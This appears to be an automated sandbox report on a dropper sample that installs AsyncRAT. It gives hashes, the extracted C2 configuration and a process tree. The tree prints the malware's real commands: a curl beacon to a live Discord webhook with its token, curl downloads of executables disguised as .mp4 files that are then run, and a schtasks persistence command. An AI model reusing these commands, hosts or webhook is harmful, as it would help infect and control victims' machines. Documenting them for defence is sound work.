Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 08:39
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240508-en
General
-
Target
Dropper.exe
-
Size
88KB
-
MD5
82f78463f2a3b53111a06367e6f9bfd7
-
SHA1
ef55bb9f0648e2f0e4444c54db5fdc4ba002ad9f
-
SHA256
3aed680e7ffde9f2f34681d7d60ee188862da9d48c7cace56060eebd6bbfb152
-
SHA512
b781362092c869cd0b8fd5f92c8e2ece37e65a8b864e7127d5a8837ab06d1a08decc795bc7a4bfa58f362af5db26d1287f289155d7408a47b9ecf054419583c0
-
SSDEEP
1536:hi8ujM8Nvd5hPSXvD1n70U4Ox+d9xHhGYL15b6tclMDgR:E84MMxSXpnJ6xfb6tYR
Malware Config
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Dropper.exe$77-aachost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation Dropper.exe Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation $77-aachost.exe -
Executes dropped EXE 3 IoCs
Processes:
$77-aachost.exe$77-sdchost.exe$77-penisballs.exepid process 4184 $77-aachost.exe 4404 $77-sdchost.exe 4980 $77-penisballs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2436 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
$77-aachost.exe$77-penisballs.exepid process 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4184 $77-aachost.exe 4980 $77-penisballs.exe 4980 $77-penisballs.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exe$77-aachost.exedescription pid process Token: SeDebugPrivilege 4404 $77-sdchost.exe Token: SeDebugPrivilege 4980 $77-penisballs.exe Token: SeDebugPrivilege 4184 $77-aachost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$77-penisballs.exepid process 4980 $77-penisballs.exe -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
Dropper.execmd.execmd.execmd.execmd.execmd.exe$77-aachost.execmd.execmd.exedescription pid process target process PID 2080 wrote to memory of 4848 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4848 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4848 2080 Dropper.exe cmd.exe PID 4848 wrote to memory of 4792 4848 cmd.exe curl.exe PID 4848 wrote to memory of 4792 4848 cmd.exe curl.exe PID 4848 wrote to memory of 4792 4848 cmd.exe curl.exe PID 2080 wrote to memory of 4564 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4564 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4564 2080 Dropper.exe cmd.exe PID 4564 wrote to memory of 1188 4564 cmd.exe curl.exe PID 4564 wrote to memory of 1188 4564 cmd.exe curl.exe PID 4564 wrote to memory of 1188 4564 cmd.exe curl.exe PID 2080 wrote to memory of 4184 2080 Dropper.exe $77-aachost.exe PID 2080 wrote to memory of 4184 2080 Dropper.exe $77-aachost.exe PID 2080 wrote to memory of 4912 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4912 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4912 2080 Dropper.exe cmd.exe PID 4912 wrote to memory of 4276 4912 cmd.exe curl.exe PID 4912 wrote to memory of 4276 4912 cmd.exe curl.exe PID 4912 wrote to memory of 4276 4912 cmd.exe curl.exe PID 2080 wrote to memory of 4404 2080 Dropper.exe $77-sdchost.exe PID 2080 wrote to memory of 4404 2080 Dropper.exe $77-sdchost.exe PID 2080 wrote to memory of 4068 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4068 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 4068 2080 Dropper.exe cmd.exe PID 4068 wrote to memory of 1864 4068 cmd.exe curl.exe PID 4068 wrote to memory of 1864 4068 cmd.exe curl.exe PID 4068 wrote to memory of 1864 4068 cmd.exe curl.exe PID 2080 wrote to memory of 4980 2080 Dropper.exe $77-penisballs.exe PID 2080 wrote to memory of 4980 2080 Dropper.exe $77-penisballs.exe PID 2080 wrote to memory of 5032 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 5032 2080 Dropper.exe cmd.exe PID 2080 wrote to memory of 5032 2080 Dropper.exe cmd.exe PID 5032 wrote to memory of 1868 5032 cmd.exe curl.exe PID 5032 wrote to memory of 1868 5032 cmd.exe curl.exe PID 5032 wrote to memory of 1868 5032 cmd.exe curl.exe PID 4184 wrote to memory of 544 4184 $77-aachost.exe cmd.exe PID 4184 wrote to memory of 544 4184 $77-aachost.exe cmd.exe PID 4184 wrote to memory of 3248 4184 $77-aachost.exe cmd.exe PID 4184 wrote to memory of 3248 4184 $77-aachost.exe cmd.exe PID 3248 wrote to memory of 2436 3248 cmd.exe timeout.exe PID 3248 wrote to memory of 2436 3248 cmd.exe timeout.exe PID 544 wrote to memory of 2548 544 cmd.exe schtasks.exe PID 544 wrote to memory of 2548 544 cmd.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5514d0abd73e992c2a1622795b33f17f4
SHA196740e82d7a119d808000783507bd92690584fe6
SHA256b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53
SHA5124600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
299KB
MD512d2d1f43b0ecf5a949adde54b1ffb65
SHA1ad0529bc9102210f3616c7b626c37d6454d44033
SHA256619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef
SHA5120a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f
-
C:\Users\Admin\AppData\Local\Temp\tmp815B.tmp.batFilesize
155B
MD5d18965182157fee8347183c7ad862427
SHA1f1d53d7eb51b900d8a64a88dce9f97bb69702773
SHA25695798dc64ea9d985f441773f68767f03151c8eff61a908a0e709298a9561ac35
SHA5127e749a2c20850cd7264f76880b3d34a2c74e4bd85e4a3cc4d290ad1f25e5005960d097e6dc00c9b4eff10192ad052241641f2a191b60226b9deca31f3097525b
-
memory/2080-0-0x000000007480E000-0x000000007480F000-memory.dmpFilesize
4KB
-
memory/2080-1-0x0000000000C30000-0x0000000000C4C000-memory.dmpFilesize
112KB
-
memory/2080-2-0x000000007480E000-0x000000007480F000-memory.dmpFilesize
4KB
-
memory/4184-6-0x00000000000C0000-0x00000000000D6000-memory.dmpFilesize
88KB
-
memory/4404-10-0x0000000000B50000-0x0000000000BA2000-memory.dmpFilesize
328KB
-
memory/4980-14-0x00000000006C0000-0x0000000000706000-memory.dmpFilesize
280KB
-
memory/4980-15-0x0000000002760000-0x0000000002766000-memory.dmpFilesize
24KB